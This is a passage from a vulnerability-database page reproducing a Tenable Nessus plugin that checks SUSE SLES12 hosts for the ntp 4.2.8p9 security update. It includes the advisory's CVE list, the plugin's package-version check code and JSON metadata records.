Search...

SUSE SLES12 Security Update : ntp (SUSE-SU-2016:3196-1)

2016-12-21T00:00:00

ID SUSE_SU-2016-3196-1.NASL
Type nessus
Reporter This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2016-12-21T00:00:00

Description

This update for ntp fixes the following issues: ntp was updated to 4.2.8p9. Security issues fixed :

CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6 unauthenticated trap information disclosure and DDoS vector.

CVE-2016-7427, bsc#1011390: Broadcast Mode Replay Prevention DoS.

CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval Enforcement DoS.

CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero Origin Timestamp Bypass.

CVE-2016-7434, bsc#1011398: NULL pointer dereference in _IO_str_init_static_internal().

CVE-2016-7429, bsc#1011404: Interface selection attack.

CVE-2016-7426, bsc#1011406: Client rate limiting and server responses.

CVE-2016-7433, bsc#1011411: Reboot sync calculation problem.

CVE-2015-5219: An endless loop due to incorrect precision to double conversion (bsc#943216). Non-security issues fixed :

Fix a spurious error message.

Other bugfixes, see /usr/share/doc/packages/ntp/ChangeLog.

Fix a regression in 'trap' (bsc#981252).

Reduce the number of netlink groups to listen on for changes to the local network setup (bsc#992606).

Fix segfault in 'sntp -a' (bsc#1009434).

Silence an OpenSSL version warning (bsc#992038).

Make the resolver task change user and group IDs to the same values as the main task. (bsc#988028)

Simplify ntpd's search for its own executable to prevent AppArmor warnings (bsc#956365).

Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:3196-1.
# The text itself is copyright (C) SUSE.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(95988);
  script_version("3.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2015-5219", "CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311");

  script_name(english:"SUSE SLES12 Security Update : ntp (SUSE-SU-2016:3196-1)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote SUSE host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"This update for ntp fixes the following issues: ntp was updated to
4.2.8p9. Security issues fixed :

  - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6
    unauthenticated trap information disclosure and DDoS
    vector.

  - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay
    Prevention DoS.

  - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval
    Enforcement DoS.

  - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero
    Origin Timestamp Bypass.

  - CVE-2016-7434, bsc#1011398: NULL pointer dereference in
    _IO_str_init_static_internal().

  - CVE-2016-7429, bsc#1011404: Interface selection attack.

  - CVE-2016-7426, bsc#1011406: Client rate limiting and
    server responses.

  - CVE-2016-7433, bsc#1011411: Reboot sync calculation
    problem.

  - CVE-2015-5219: An endless loop due to incorrect
    precision to double conversion (bsc#943216).
    Non-security issues fixed :

  - Fix a spurious error message.

  - Other bugfixes, see
    /usr/share/doc/packages/ntp/ChangeLog.

  - Fix a regression in 'trap' (bsc#981252).

  - Reduce the number of netlink groups to listen on for
    changes to the local network setup (bsc#992606).

  - Fix segfault in 'sntp -a' (bsc#1009434).

  - Silence an OpenSSL version warning (bsc#992038).

  - Make the resolver task change user and group IDs to the
    same values as the main task. (bsc#988028)

  - Simplify ntpd's search for its own executable to prevent
    AppArmor warnings (bsc#956365).

Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1009434"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011377"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011390"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011395"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011398"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011404"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011406"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011411"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011417"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=943216"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=956365"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=981252"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=988028"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=992038"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=992606"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2015-5219/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7426/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7427/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7428/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7429/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7431/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7433/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7434/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9310/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9311/"
  );
  # https://www.suse.com/support/update/announcement/2016/suse-su-20163196-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?1613e866"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :

SUSE Linux Enterprise Server for SAP 12:zypper in -t patch
SUSE-SLE-SAP-12-2016-1852=1

SUSE Linux Enterprise Server 12-LTSS:zypper in -t patch
SUSE-SLE-SERVER-12-2016-1852=1

To bring your system up-to-date, use 'zypper patch'."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-doc");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/12/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/21");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES12", "SUSE " + os_ver);

if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" &gt;!&lt; cpu && "s390x" &gt;!&lt; cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES12" && (! preg(pattern:"^(0)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0", os_ver + " SP" + sp);


flag = 0;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-debuginfo-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-debugsource-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-doc-4.2.8p9-46.18.1")) flag++;


if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ntp");
}

JSON Vulners Source

Initial Source

{"id": "SUSE_SU-2016-3196-1.NASL", "bulletinFamily": "scanner", "title": "SUSE SLES12 Security Update : ntp (SUSE-SU-2016:3196-1)", "description": "This update for ntp fixes the following issues: ntp was updated to\n4.2.8p9. Security issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2016-12-21T00:00:00", "modified": "2016-12-21T00:00:00", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "href": "https://www.tenable.com/plugins/nessus/95988", "reporter": "This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2016-7434/", "https://www.suse.com/security/cve/CVE-2016-7427/", "https://www.suse.com/security/cve/CVE-2016-7433/", "https://bugzilla.suse.com/show_bug.cgi?id=1011377", "https://www.suse.com/security/cve/CVE-2016-7431/", "https://bugzilla.suse.com/show_bug.cgi?id=992038", "https://bugzilla.suse.com/show_bug.cgi?id=981252", "https://www.suse.com/security/cve/CVE-2016-7428/", "https://www.suse.com/security/cve/CVE-2016-7429/", "https://bugzilla.suse.com/show_bug.cgi?id=1011404", "https://bugzilla.suse.com/show_bug.cgi?id=943216", "https://bugzilla.suse.com/show_bug.cgi?id=1011398", "https://bugzilla.suse.com/show_bug.cgi?id=1011390", "https://bugzilla.suse.com/show_bug.cgi?id=992606", "https://bugzilla.suse.com/show_bug.cgi?id=956365", "https://www.suse.com/security/cve/CVE-2015-5219/", "https://bugzilla.suse.com/show_bug.cgi?id=1011417", "https://www.suse.com/security/cve/CVE-2016-9310/", "https://bugzilla.suse.com/show_bug.cgi?id=988028", "https://www.suse.com/security/cve/CVE-2016-7426/", "https://bugzilla.suse.com/show_bug.cgi?id=1009434", "https://bugzilla.suse.com/show_bug.cgi?id=1011395", "http://www.nessus.org/u?1613e866", "https://www.suse.com/security/cve/CVE-2016-9311/", "https://bugzilla.suse.com/show_bug.cgi?id=1011406", "https://bugzilla.suse.com/show_bug.cgi?id=1011411"], "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "type": "nessus", "lastseen": "2021-01-07T14:25:10", "edition": 37, "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2016-3193-1.NASL", "PHOTONOS_PHSA-2017-0003_NTP.NASL", "SUSE_SU-2016-3195-1.NASL", "FREEBSD_PKG_8DB8D62AB08B11E68EBAD050996490D0.NASL", "SLACKWARE_SSA_2016-326-01.NASL", "PHOTONOS_PHSA-2017-0003_NTPSTAT.NASL", "NTP_4_2_8P9.NASL", "OPENSUSE-2016-1525.NASL", "FREEBSD_PKG_FCEDCDBBC86E11E6B1CF14DAE9D210B8.NASL", "PHOTONOS_PHSA-2017-0003.NASL"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171129-01-NTPD"]}, {"type": "archlinux", "idList": ["ASA-201611-28"]}, {"type": "freebsd", "idList": ["8DB8D62A-B08B-11E6-8EBA-D050996490D0", "FCEDCDBB-C86E-11E6-B1CF-14DAE9D210B8"]}, {"type": "slackware", "idList": ["SSA-2016-326-01"]}, {"type": "cert", "idList": ["VU:633847"]}, {"type": "symantec", "idList": ["SMNTC-1393"]}, {"type": "cisco", "idList": ["CISCO-SA-20161123-NTPD"]}, {"type": "amazon", "idList": ["ALAS-2017-781"]}, {"type": "redhat", "idList": ["RHSA-2017:0252"]}, {"type": "centos", "idList": ["CESA-2017:0252"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-0252", "ELSA-2018-0855"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872098", "OPENVAS:1361412562310882654", "OPENVAS:1361412562310106754", "OPENVAS:1361412562311220171024", "OPENVAS:1361412562311220171023", "OPENVAS:1361412562310882653", "OPENVAS:1361412562310843238", "OPENVAS:1361412562310872099", "OPENVAS:1361412562310871756", "OPENVAS:1361412562310872101"]}, {"type": "fedora", "idList": ["FEDORA:457C1608C014", "FEDORA:9160C605D560", "FEDORA:012B26015E2A"]}, {"type": "cve", "idList": ["CVE-2016-9311", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7431", "CVE-2016-7428", "CVE-2015-5219", "CVE-2016-7429", "CVE-2016-7426"]}, {"type": "aix", "idList": ["NTP_ADVISORY8.ASC"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681716", "MYHACK58:62201681749", "MYHACK58:62201682160"]}, {"type": "f5", "idList": ["F5:K60352002", "F5:K51444934", "SOL60352002", "F5:K63326092", "SOL63326092", "F5:K80996302", "F5:K55405388", "F5:K87922456"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:8722C197C1671303FFCA9E919368B734"]}, {"type": "ubuntu", "idList": ["USN-3349-1", "USN-3707-2"]}, {"type": "seebug", "idList": ["SSV:96649", "SSV:96650", "SSV:92551", "SSV:96648"]}], "modified": "2021-01-07T14:25:10", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-07T14:25:10", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3196-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95988);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"SUSE SLES12 Security Update : ntp (SUSE-SU-2016:3196-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues: ntp was updated to\n4.2.8p9. Security issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5219/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7426/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7428/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7429/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7431/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7434/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9310/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9311/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163196-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1613e866\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1852=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1852=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-4.2.8p9-46.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debuginfo-4.2.8p9-46.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-debugsource-4.2.8p9-46.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"ntp-doc-4.2.8p9-46.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "95988", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "scheme": null, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}}

{"nessus": [{"lastseen": "2021-01-07T14:25:09", "description": "This update for ntp fixes the following issues: ntp was updated to\n4.2.8p9. Security issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. 